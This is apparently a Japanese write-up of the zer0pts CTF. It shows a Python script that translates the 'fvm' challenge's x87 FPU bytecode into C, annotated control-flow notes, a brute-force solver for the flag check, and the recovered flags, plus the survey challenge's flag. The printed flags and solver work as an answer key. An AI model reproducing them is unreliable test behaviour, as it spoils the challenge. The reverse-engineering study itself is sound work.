#!/usr/bin/env python3 code = bytes.fromhex("23 38 41 24 43 54 24 43 54 73 24 38 38 41 43 27 41 24 43 54 73 24 38 38 23 51 43 43 43 54 73 23 24 41 24 38 43 43 54 73 23 38 38 51 43 43 24 43 54 73 23 38 38 43 43 54 22 41 73 21 62 94 01 62 B2 01 62 84 01 39 05 3F 11 F4 FF 29 57 81 0E 40 65 03 00 32 53 32 3A 39 5E 57 F3 B4 A3 8C 7F BA 07 40 65 03 00 31 53 31 3A 62 67 01 62 85 01 62 57 01 39 B7 73 80 E1 B0 72 87 F2 03 40 65 03 00 32 53 32 3A 39 3F 68 A3 E4 04 9A 3B 8F 07 40 65 03 00 31 53 31 3A 62 3A 01 62 58 01 62 2A 01 39 54 27 B5 B6 95 52 5D CD 0B 40 65 03 00 32 53 32 3A 39 28 91 9A 4A A2 71 37 91 07 40 65 03 00 31 53 31 3A 62 0D 01 62 2B 01 62 FD 00 39 A3 86 14 05 41 8C 74 E5 0B 40 65 03 00 32 53 32 3A 39 BC 61 ED F2 E9 6E C1 AB 06 40 65 03 00 31 53 31 3A 62 E0 00 62 FE 00 62 D0 00 39 88 92 3A E0 69 3F 54 92 06 40 65 03 00 32 53 32 3A 39 0F D1 BE E3 39 A1 96 C5 05 40 65 03 00 31 53 31 3A 62 B3 00 62 D1 00 62 A3 00 39 83 EA 7B 97 E5 4C D3 EA 06 40 65 03 00 32 53 32 3A 39 87 EF B0 D1 5C FE 86 AD 04 40 65 03 00 31 53 31 3A 62 86 00 62 A4 00 62 76 00 39 19 42 6C D4 CA F6 F2 D9 09 40 65 03 00 32 53 32 3A 39 EF FF DA 15 13 EA AE DB 06 40 65 03 00 31 53 31 3A 62 59 00 62 77 00 62 49 00 39 FE 13 97 DF CD 12 7E F0 0A 40 65 03 00 32 53 32 3A 39 1C AF CF 1F 96 45 41 A5 06 40 65 03 00 31 53 31 3A 72 23 38 43 25 41 24 38 43 43 54 64 05 00 3A 3A 63 7D 00 3A 39 5A 88 34 14 A0 C3 05 BD FE 3F 64 8E 00 63 6B 00 32 38 32 38 32 43 32 41 32 61 72 62 42 00 72 62 3E 00 22 22 41 23 43 43 24 38 41 54 24 38 43 43 54 24 43 54 44 38 52 42 43 31 61 72 62 21 00 72 62 1D 00 22 22 41 23 43 43 24 38 41 54 24 38 43 43 54 24 43 54 44 38 53 22 41 31 52 43 43 31 61 31 23 38 43 23 43 54 22 41 67 0F 00 24 38 43 24 43 25 41 24 43 54 68 02 00 31 61 23 25 43 24 41 23 38 43 43 54 73 23 24 41 24 38 43 43 54 73 22 23 41 24 38 43 43 54 73 63 21 00 23 22 45 41 24 38 38 43 43 43 54 73 24 38 26 23 41 24 41 43 43 54 73 23 38 43 24 43 54 73 63 00 00 23 38 43 54 73 71") def parse_code(code): # 「fstsw ax」直後に普通にaxを使ったCコードを書くと、その間に「スタックからax用C変数を読み込む」のが挟まってfstsw結果が破壊されてしまったので関数へ隔離 # 他にも動作確認関数も用意 global_variable_code = """ __declspec(naked) short fstsw(void) { __asm{ fstsw ax ret } } long double get_st_0(void) { long double x; __asm { fst x } return x; } long double get_st_1(void) { long double x; __asm { fxch st(1) fst x fxch st(1) } return x; } """ main_content_code = """ short ax = 0; int savedIndex = 0; int index = 0; int getchar_count = 0; while(1){ switch(index){ """ index = 0 savedIndex = -1 while index < len(code): variable_name = f"V{index:04}" main_content_code += f"case {index}: " b = code[index] index += 1 main_content_code += f"/*{chr(b)}*/ " if (((b - 98) + 256 ) % 256) <= 13: # "b"~"o"が該当 wSeek = code[index] + (code[index+1] << 8) index += 2 is_end_of_block = False # https://www.felixcloutier.com/x86/ if b == ord("!"): main_content_code += f"""__asm{{ fldz }}""" elif b == ord('"'): main_content_code += f"""__asm{{ fld1 }}""" elif b == ord("#"): main_content_code += f"""__asm{{ fldpi }}""" elif b == ord("$"): main_content_code += f"""__asm{{ fldl2t }}""" elif b == ord("%"): main_content_code += f"""__asm{{ fldl2e }}""" elif b == ord("&"): main_content_code += f"""__asm{{ fldlg2 }}""" elif b == ord("'"): main_content_code += f"""__asm{{ fldln2 }}""" elif b == ord("1"): main_content_code += f"""__asm{{ fxch st(1) }}""" elif b == ord("2"): main_content_code += f"""__asm{{ fxch st(2) }}""" elif b == ord("3"): main_content_code += f"""__asm{{ fxch st(3) }}""" elif b == ord("4"): main_content_code += f"""__asm{{ fxch st(4) }}""" elif b == ord("5"): main_content_code += f"""__asm{{ fxch st(5) }}""" elif b == ord("6"): main_content_code += f"""__asm{{ fxch st(6) }}""" elif b == ord("7"): main_content_code += f"""__asm{{ fxch st(7) }}""" elif b == ord("8"): main_content_code += f"""__asm{{ fst st(7) fdecstp }}""" elif b == ord("9"): # Pythonのstructパッケージだと8バイト浮動小数点数までのみで10バイト長は無理そうだったので、元通りasmに頼る variable_value = f"""{{{",".join(map(lambda x:str(x), code[index:index+10]))}}}""" index += 10 global_variable_code += f"unsigned char {variable_name}[10] = {variable_value};\n" main_content_code += f"""__asm{{ mov esi, offset {variable_name} fld tbyte ptr [esi] }} /*printf("9: fld %.20Lf \\n", get_st_0());*/""" elif b == ord(":"): main_content_code += f"""__asm{{ ffree st fincstp }}""" elif b == ord("A"): main_content_code += f"""__asm{{ faddp st(1), st }}""" elif b == ord("B"): main_content_code += f"""__asm{{ fsubp st(1), st }}""" elif b == ord("C"): main_content_code += f"""__asm{{ fmulp st(1), st }}""" elif b == ord("D"): main_content_code += f"""__asm{{ fdivp st(1), st }}""" elif b == ord("E"): main_content_code += f"""__asm{{ fchs }}""" elif b == ord("Q"): main_content_code += f"""__asm{{ fsqrt }}""" elif b == ord("R"): main_content_code += f"""__asm{{ fsin }}""" elif b == ord("S"): main_content_code += f"""__asm{{ fcos }}""" elif b == ord("T"): main_content_code += f"""__asm{{ frndint }}""" elif b == ord("a"): main_content_code += f"""__asm{{ fistp savedIndex }} index = savedIndex; /*printf("a: index := %d\\n", index);*/""" is_end_of_block = True elif b == ord("b"): main_content_code += f"""savedIndex = {index}; __asm{{ fild savedIndex }} index = {index + wSeek}; /*printf("b: index := %d\\n", index);*/""" is_end_of_block = True elif b == ord("c"): main_content_code += f"""index = {index + wSeek}; /*printf("c: index := %d\\n", index);*/""" is_end_of_block = True elif b == ord("d"): main_content_code += f"""printf("fcomp %.20Lf, %.20Lf\\n", get_st_0(), get_st_1()); __asm{{ fcomp st(1) }} ax = fstsw(); if ( (ax & 0x4000) != 0 ) {{index = {index + wSeek};}} else {{index = {index};}} /*printf("d: ax & 0x4000 => %d, index := %d\\n", !!(ax & 0x4000), index);*/""" is_end_of_block = True elif b == ord("e"): main_content_code += f"""printf("fcomp %.20Lf, %.20Lf\\n", get_st_0(), get_st_1()); __asm{{ fcomp st(1) }} ax = fstsw(); if ( (ax & 0x4000) == 0 ) {{index = {index + wSeek};}} else {{index = {index};}} /*printf("e: ax & 0x4000 => %d, index := %d\\n", !!(ax & 0x4000), index);*/""" is_end_of_block = True elif b == ord("f"): main_content_code += f"""/*printf("fcomp %.20Lf, %.20Lf\\n", get_st_0(), get_st_1()); __asm{{ fcomp st(1) }} ax = fstsw(); if ( (ax & 0x100) == 0 ) {{index = {index + wSeek};}} else {{index = {index};}} /*printf("f: ax & 0x0100 => %d, index := %d\\n", !!(ax & 0x0100), index);*/""" is_end_of_block = True elif b == ord("g"): main_content_code += f"""/*printf("fcomp %.20Lf, %.20Lf\\n", get_st_0(), get_st_1()); */__asm{{ fcomp st(1) }} ax = fstsw(); if ( (ax & 0x100) == 0 && (ax & 0x4000) == 0 ) {{index = {index + wSeek};}} else {{index = {index};}} /*printf("g: ax & 0x4000 => %d, ax & 0x0100 => %d, index := %d\\n", !!(ax & 0x4000), !!(ax & 0x0100), index);*/""" is_end_of_block = True elif b == ord("h"): main_content_code += f"""/*printf("fcomp %.20Lf, %.20Lf\\n", get_st_0(), get_st_1());*/ __asm{{ fcomp st(1) }} ax = fstsw(); if ( (ax & 0x100) != 0 || (ax & 0x4000) != 0 ) {{index = {index + wSeek};}} else {{index = {index};}} /*printf("h: ax & 0x4000 => %d, ax & 0x0100 => %d, index := %d\\n", !!(ax & 0x4000), !!(ax & 0x0100), index);*/""" is_end_of_block = True elif b == ord("i"): main_content_code += f"""/*printf("fcomp %.20Lf, %.20Lf\\n", get_st_0(), get_st_1());*/ __asm{{ fcomp st(1) }} ax = fstsw(); if ( (ax & 0x100) != 0 ) {{index = {index + wSeek};}} else {{index = {index};}} /*printf("i: ax & 0x0100 => %d, index := %d\\n", !!(ax & 0x0100), index);*/""" is_end_of_block = True elif b == ord("q"): main_content_code += "goto END_OF_EXECUTE;" elif b == ord("r"): main_content_code += f"""savedIndex = getchar(); printf("%d's getchar() => %c\\n", ++getchar_count, savedIndex); __asm{{ fild savedIndex }}""" elif b == ord("s"): main_content_code += f"""__asm{{ fistp savedIndex }} putchar(savedIndex);""" else: raise Exception(f"Unknown code: {b:02X}") if is_end_of_block: main_content_code += " break;\n" main_content_code += "\n" main_content_code += """default: puts("SHOULD NOT REACH HERE."); } } END_OF_EXECUTE:; """ return (global_variable_code, main_content_code) (global_variable_code, main_content_code) = parse_code(code) print("#include <stdio.h>") print(global_variable_code) print("int main(void) {") print("setvbuf(stdout, NULL, _IONBF, 0);") # disable buffering ← 他プログラムから対話的操作しようとした名残です print("// setvbuf(stdin, NULL, _IOLBF, 0);") # 不要かもしれない print("""{ short mode = 0x37f; __asm {fldcw mode} }""") # 最重要の丸めモード等の設定、さもなければpi*pi時点でELF版から誤差がでる ← このスクリプトを書いている時点ではmain関数のfinit命令を見逃していました!その命令と同じことだと思います。 print(main_content_code) print("return 0;") print("}")
文字列を出力- 4文字単位で、以下の処理を8回行い、累計32文字を読み込み
- 4N+1文字目と4N+2文字目を読み込み、それぞれ
0x20 <= 入力文字 <= 0x7E
の範囲であることを検証 tmp = (4N+2文字目); tmp = (tmp * 2 * pi) / 256.0; tmp -= sin(tmp); 結果1 = tmp * (4N+1文字目);
を計算- 4N+3文字目と4N+4文字目を読み込み、それぞれ
0x20 <= 入力文字 <= 0x7E
の範囲であることを検証 tmp = (4N+4文字目); tmp = (tmp * 2 * pi) / 256.0; tmp = (cos(tmp) + 1) * sin(tmp); 結果2 = tmp * (4N+3文字目);
を計算結果3 = 結果1 * 結果2; 結果4 = 結果1 + 結果2;
- 4N+1文字目と4N+2文字目を読み込み、それぞれ
- 33文字目を読み込み、その値が
であることを検証 - 正解判定用の数値が、
を16回適用した値)であることを検証。 - 検証結果に従って、
#!/usr/bin/env python3 import math def isclose(a, b): return abs(a - b) < 0.000001 def restore_input(mul1234, sum1234): candidates = list(reversed(range(0x20, 0x7F))) for v2 in candidates: for v3 in candidates: for v4 in candidates: c4 = v4 * 2 * math.pi / 256 c4 = (math.cos(c4) + 1) * math.sin(c4) c34 = c4 * v3 c2 = v2 * 2 * math.pi / 256 c2 -= math.sin(c2) c12 = sum1234 - c34 v1 = round(c12 / c2) if isclose(v1, c12 / c2) and 0x20 <= v1 <= 0x7E and isclose(c12 * c34, mul1234): # print(c12*c34) return (v1, v2, v3, v4) # 処理を追うときの入力と、その時のデバッガーで確認したSTレジスタ値 test = restore_input(807.2474666155433025, 75.31200230760765110) # print(test) assert test[0] == ord("0") assert test[1] == ord("1") assert test[2] == ord("2") assert test[3] == ord("3") expected_values = [ (33111.16406178876059129834, 372.99647947631336819541), (30.31613672435928918958, 286.46563779033641594651), (6571.66532461872429848881, 290.43315533297311503702), (7342.56848339051157381618, 171.75559866124001473509), (146.32909261440596537795, 98.79419880776495688224), (234.82539210270252283408, 43.38182969121793064460), (1743.59262601364935107995, 219.68325919421749858884), (3847.87959086742284853244, 165.25496805454866944274), ] for (v1, v2) in expected_values: t =restore_input(v1, v2) print("".join(map(chr, t)), end = "") print("}")
$ ./solve.py zer0pts{fun_0f_FPU_st4ck_m4ch1n3} $ ./fvm FLAG: zer0pts{fun_0f_FPU_st4ck_m4ch1n3} OK! $
フラグを入手できました: zer0pts{fun_0f_FPU_st4ck_m4ch1n3}
- fvm本家の方でのブレークポイント設置場所 - switch開幕 :: 「b *(_ZN3fvm7emulateEv+0x8d)」 - r(=read) :: 「b *(_ZN3fvm7emulateEv+0xE8)」 - g :: 「b *(_ZN3fvm7emulateEv+0x188)」 - 9 :: 「b *(_ZN3fvm7emulateEv+0x2E7)」 - e :: 「b *(_ZN3fvm7emulateEv+0x1EA)」 - FPU status registerの話 https://c9x.me/x86/html/file_module_x86_id_124.html , https://xem.github.io/minix86/manual/intel-x86-and-64-manual-vol1/o_7281d5ea06a5b67a-194.html - 0x0100 :: Condition CodeのC0、fcomp後だと「ST(0) < ST(i)」(or unordered) - 0x4000 :: Condition CodeのC3、fcomp後だと「ST(0) = ST(i)」(or unordered) - 構造(4文字ごとの小さな分岐2回でそれぞれfcosを通らせる。16回全部fcos突入で正解) - 0-60: プロンプト表示, jmp to 467 - 4文字単位の計算結果の検証ゾーン - 63: b命令でjmp to 500 (499からここへ飛んだ) - 66: b命令でjmp to 457 (536からここへ飛んだ、あとで69へ帰ってくる) - 69-105: (80,98,で内部的に小さな分岐を含む) jmp to 467 (4文字getcharの後に457のからくる) - 80では「12文字目統合結果*34文字目統合結果」が9命令結果との一致を確認 - 98では「12文字目統合結果+34文字目統合結果」が9命令結果との一致を確認 - 108: b命令でjmp to 500 (6文字目のgetcharの後、475の先からくる) - 111: b命令でjmp to 457 - 114-150: (125,143で内部的に小さな分岐を含む) jmp to 467 (8文字getcharの後に457のからくる) - 153: b命令でjmp to 500 - 156: b命令でjmp to 457 - 159-195: (170,188で内部的に小さな分岐を含む) jmp to 467 (12文字getcharの後に457のからくる) - 198: b命令でjmp to 500 - 201: b命令でjmp to 457 - 204-240: (215,233で内部的に小さな分岐を含む) jmp to 467 (16文字getcharの後に457のからくる) - 243: b命令でjmp to 500 - 246: b命令でjmp to 457 - 249-285: (260,278で内部的に小さな分岐を含む) jmp to 467 (20文字getcharの後に457のからくる) - 288: b命令でjmp to 500 - 291: b命令でjmp to 457 - 294-330: (305,323で内部的に小さな分岐を含む) jmp to 467 (24文字getcharの後に457のからくる) - 333: b命令でjmp to 500 - 336: b命令でjmp to 457 - 339-375: (350,368で内部的に小さな分岐を含む) jmp to 467 (28文字getcharの後に457のからくる) - 378: b命令でjmp to 500 - 381: b命令でjmp to 457 - 384-431: (395,413で内部的に小さな分岐を含む,420でgetcharを含む) jmp to 439(最終判定) or 434(=NG) (←33文字目のgetchar, "}"判定)(32文字getcharの後に457のからくる) - 434-436: jmp to 564(=NG) - 439-451: jmp to 596(=OK!) or 454(=NG) (←最終判定) - 454: jmp to 564(=NG) - 4文字単位での最終計算ゾーン - 457-466: なにかして466でa命令でどっかへjmp(66から来たので69へ帰る) - ST(0):536での3文字目4文字目統合結果, ST(1):499での1文字目2文字目統合結果 - ST(1) <- 12文字目統合結果*34文字目統合結果 ("0123"の場合は「807.2474666155433025」) - ST(2) <- 12文字目統合結果+34文字目統合結果 ("0123"の場合は「75.31200230760765110」) - 467-468: 467でgetchar, jmp to 537 (←1,5,9,13,17,21,25,29文字目のgetchar) - 471-472: 471でgetchar, jmp to 537 (←2,6,10,14,18,22,26,30文字目のgetchar、この時点で1回目入力はST(0)にある) (その後a命令で475へ) - 475-499: なにかしてa命令でどっかへjmp (63へ飛んだ) - ST(0):2文字目、ST(1):1文字目から始まって - 2文字目 *= 2 * pi - 2文字目 /= 256.0 # case 493 D - 2文字目 -=- sin(2文字目) # case 496 B - fmulp(↑の2文字目結果, 1文字目そのまま) # これで領域を1つへ統合、1文字目'1'で2文字目'2'のときは「12.94311066564498415」になる - 3~4文字目入力ゾーン? - 500-501: 500でgetchar, jmp to 537 (←3,7,11,15,19,23,27,31文字目のgetchar) - 504-505: 504でgetchar, jmp to 537 (←4,8,12,16,20,24,28,32文字目のgetchar、このとき3文字目はST(0)にある) - 508-536: なにかしてa命令でどっかへjmp (66へ飛んだ) - ST(0):4文字目、ST(1):3文字目、ST(2)はjmp先の66、ST(3):↑の1文字目2文字目の統合結果 - 4文字目 *= 2 * pi # case 513 C - 4文字目 /= 256.0 # case 526 D - 4文字目 = (cos(4文字目) + 1) * sin(4文字目) # case 533 C - fmul(↑の4文字目結果, 3文字目そのまま) # これで領域を1つへ統合、3文字目'3'で4文字目'4'のときは「62.36889164196266695」になる - 0x20 <= x <= 0x7E判定ゾーン (L1042) - 537-546: jmp to 564(=NG, 32未満判定?) or 549 - 549-559: jmp to 564(=NG, 128以上判定?) or 562(=aでどっかへ) - 562-563: なにかやってa命令でどっかへjmp(飛び順: [471, 475](=b命令で537へ行っている場合はその直後へ飛んでる?)) - 終了ゾーン - 564-593: 「NG.」出力, jmp to 629(=fin) - 596-626: 「OK!」出力, jmp to 629(=fin) - 629-634: 「\n」出力して終了
[survey] survey (135 team solved, 88 points)
Please answer the survey for the flag. The more detailed your feedback is, the happier the organizers will be.
問題文中に、Google Formへのリンクがあります。回答してフラグを入手できました: zer0pts{th4nk5_f0r_g1v1ng_u5_th3_f33db4ck!!}
- warmup難易度でも解けたのは2ジャンルだけで、他のジャンルは手も足も出ませんでした。
- 逆コンパイラが普及している現状だからこそ面白い問題や、Windows環境では稀によく見る処理がLinux環境でも実現できると分かった問題など、興味深い問題に正解できたのは嬉しいです。
- 浮動小数点演算命令にある程度慣れられました。けれどもControl Wordレジスタの設定値の違いだけで誤差が積み重なっていくのは恐ろしいことにも思いました。
- fvm問題に取り組んでいるうちに夜が明けていました。CTFで徹夜をするのは初めての体験です!解けた後はよく眠れました。